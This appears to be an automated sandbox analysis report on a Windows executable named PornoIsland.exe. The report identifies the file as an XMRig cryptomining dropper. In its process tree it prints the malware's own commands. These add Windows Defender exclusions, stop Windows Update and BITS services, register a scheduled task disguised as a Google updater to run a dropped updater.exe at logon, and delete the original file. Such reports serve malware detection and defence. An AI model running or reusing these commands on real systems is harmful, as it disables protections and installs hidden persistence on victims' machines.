Analysis
-
max time kernel
130s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2023 17:38
Static task
static1
Behavioral task
behavioral1
Sample
PornoIsland.exe
Resource
win7-20230831-en
General
-
Target
PornoIsland.exe
-
Size
9.8MB
-
MD5
464d2b53055d68784c4daff138109464
-
SHA1
e9a861ee47ea22b575e645838ad9965dfce4e463
-
SHA256
a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604
-
SHA512
e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91
-
SSDEEP
196608:dGTBQHJTbJk3kJr3CG+Rnm/fMuOzA3k95gMwmqXmIQS:dCBQpTb60Jf+RnQf/+A3klw0IZ
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1980 created 3196 1980 PornoIsland.exe 38 PID 1980 created 3196 1980 PornoIsland.exe 38 PID 1980 created 3196 1980 PornoIsland.exe 38 PID 1980 created 3196 1980 PornoIsland.exe 38 PID 1980 created 3196 1980 PornoIsland.exe 38 PID 2504 created 3196 2504 updater.exe 38 PID 2504 created 3196 2504 updater.exe 38 PID 2504 created 3196 2504 updater.exe 38 PID 2504 created 3196 2504 updater.exe 38 PID 2504 created 3196 2504 updater.exe 38 -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2504-75-0x00007FF6B5660000-0x00007FF6B603B000-memory.dmp xmrig behavioral2/memory/1728-79-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-81-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-84-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-87-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-89-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-91-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-93-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-95-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-97-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-99-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig behavioral2/memory/1728-101-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 2504 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2504 set thread context of 3016 2504 updater.exe 116 PID 2504 set thread context of 1728 2504 updater.exe 117 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3788 sc.exe 32 sc.exe 3980 sc.exe 3684 sc.exe 1364 sc.exe 4000 sc.exe 3304 sc.exe 1844 sc.exe 988 sc.exe 3960 sc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1980 PornoIsland.exe 1980 PornoIsland.exe 1952 powershell.exe 1952 powershell.exe 1980 PornoIsland.exe 1980 PornoIsland.exe 1980 PornoIsland.exe 1980 PornoIsland.exe 3784 powershell.exe 3784 powershell.exe 1980 PornoIsland.exe 1980 PornoIsland.exe 1980 PornoIsland.exe 1980 PornoIsland.exe 2504 updater.exe 2504 updater.exe 2584 powershell.exe 2584 powershell.exe 2504 updater.exe 2504 updater.exe 2504 updater.exe 2504 updater.exe 996 powershell.exe 996 powershell.exe 2504 updater.exe 2504 updater.exe 2504 updater.exe 2504 updater.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeIncreaseQuotaPrivilege 3784 powershell.exe Token: SeSecurityPrivilege 3784 powershell.exe Token: SeTakeOwnershipPrivilege 3784 powershell.exe Token: SeLoadDriverPrivilege 3784 powershell.exe Token: SeSystemProfilePrivilege 3784 powershell.exe Token: SeSystemtimePrivilege 3784 powershell.exe Token: SeProfSingleProcessPrivilege 3784 powershell.exe Token: SeIncBasePriorityPrivilege 3784 powershell.exe Token: SeCreatePagefilePrivilege 3784 powershell.exe Token: SeBackupPrivilege 3784 powershell.exe Token: SeRestorePrivilege 3784 powershell.exe Token: SeShutdownPrivilege 3784 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeSystemEnvironmentPrivilege 3784 powershell.exe Token: SeRemoteShutdownPrivilege 3784 powershell.exe Token: SeUndockPrivilege 3784 powershell.exe Token: SeManageVolumePrivilege 3784 powershell.exe Token: 33 3784 powershell.exe Token: 34 3784 powershell.exe Token: 35 3784 powershell.exe Token: 36 3784 powershell.exe Token: SeIncreaseQuotaPrivilege 3784 powershell.exe Token: SeSecurityPrivilege 3784 powershell.exe Token: SeTakeOwnershipPrivilege 3784 powershell.exe Token: SeLoadDriverPrivilege 3784 powershell.exe Token: SeSystemProfilePrivilege 3784 powershell.exe Token: SeSystemtimePrivilege 3784 powershell.exe Token: SeProfSingleProcessPrivilege 3784 powershell.exe Token: SeIncBasePriorityPrivilege 3784 powershell.exe Token: SeCreatePagefilePrivilege 3784 powershell.exe Token: SeBackupPrivilege 3784 powershell.exe Token: SeRestorePrivilege 3784 powershell.exe Token: SeShutdownPrivilege 3784 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeSystemEnvironmentPrivilege 3784 powershell.exe Token: SeRemoteShutdownPrivilege 3784 powershell.exe Token: SeUndockPrivilege 3784 powershell.exe Token: SeManageVolumePrivilege 3784 powershell.exe Token: 33 3784 powershell.exe Token: 34 3784 powershell.exe Token: 35 3784 powershell.exe Token: 36 3784 powershell.exe Token: SeIncreaseQuotaPrivilege 3784 powershell.exe Token: SeSecurityPrivilege 3784 powershell.exe Token: SeTakeOwnershipPrivilege 3784 powershell.exe Token: SeLoadDriverPrivilege 3784 powershell.exe Token: SeSystemProfilePrivilege 3784 powershell.exe Token: SeSystemtimePrivilege 3784 powershell.exe Token: SeProfSingleProcessPrivilege 3784 powershell.exe Token: SeIncBasePriorityPrivilege 3784 powershell.exe Token: SeCreatePagefilePrivilege 3784 powershell.exe Token: SeBackupPrivilege 3784 powershell.exe Token: SeRestorePrivilege 3784 powershell.exe Token: SeShutdownPrivilege 3784 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeSystemEnvironmentPrivilege 3784 powershell.exe Token: SeRemoteShutdownPrivilege 3784 powershell.exe Token: SeUndockPrivilege 3784 powershell.exe Token: SeManageVolumePrivilege 3784 powershell.exe Token: 33 3784 powershell.exe Token: 34 3784 powershell.exe Token: 35 3784 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe 1728 conhost.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4052 wrote to memory of 4000 4052 cmd.exe 91 PID 4052 wrote to memory of 4000 4052 cmd.exe 91 PID 4052 wrote to memory of 3304 4052 cmd.exe 92 PID 4052 wrote to memory of 3304 4052 cmd.exe 92 PID 4052 wrote to memory of 988 4052 cmd.exe 93 PID 4052 wrote to memory of 988 4052 cmd.exe 93 PID 4052 wrote to memory of 1844 4052 cmd.exe 94 PID 4052 wrote to memory of 1844 4052 cmd.exe 94 PID 4052 wrote to memory of 3788 4052 cmd.exe 95 PID 4052 wrote to memory of 3788 4052 cmd.exe 95 PID 2644 wrote to memory of 1084 2644 cmd.exe 103 PID 2644 wrote to memory of 1084 2644 cmd.exe 103 PID 4252 wrote to memory of 32 4252 cmd.exe 109 PID 4252 wrote to memory of 32 4252 cmd.exe 109 PID 4252 wrote to memory of 3980 4252 cmd.exe 110 PID 4252 wrote to memory of 3980 4252 cmd.exe 110 PID 4252 wrote to memory of 3960 4252 cmd.exe 111 PID 4252 wrote to memory of 3960 4252 cmd.exe 111 PID 4252 wrote to memory of 3684 4252 cmd.exe 112 PID 4252 wrote to memory of 3684 4252 cmd.exe 112 PID 4252 wrote to memory of 1364 4252 cmd.exe 113 PID 4252 wrote to memory of 1364 4252 cmd.exe 113 PID 2504 wrote to memory of 3016 2504 updater.exe 116 PID 2504 wrote to memory of 1728 2504 updater.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3196
-
C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe"C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4000
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3304
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1844
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3788
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqljzfy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4524
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2584
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:32
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3980
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3960
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3684
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1364
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqljzfy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:996
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:3016
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1728
-
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2504
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
1KB
MD505e343b77f6414a6903f7224194f7673
SHA16cac56c039beba339c6a3c393b1ba0a76e3d3a44
SHA256580447d54d45eb51f177bf20932e79f8492e447d1eba6365ced1d63b1d742d9b
SHA512b65a1f89b625dd60e70a38cc5eab31ab52ef07a5cd71141616afb19859a3bb4c5fdadcd81a76892ce19dda92d1fd1b6b80c338322a6ae40e9f793ec769278566
-
Filesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9.8MB
MD5464d2b53055d68784c4daff138109464
SHA1e9a861ee47ea22b575e645838ad9965dfce4e463
SHA256a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604
SHA512e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91
-
Filesize
9.8MB
MD5464d2b53055d68784c4daff138109464
SHA1e9a861ee47ea22b575e645838ad9965dfce4e463
SHA256a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604
SHA512e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91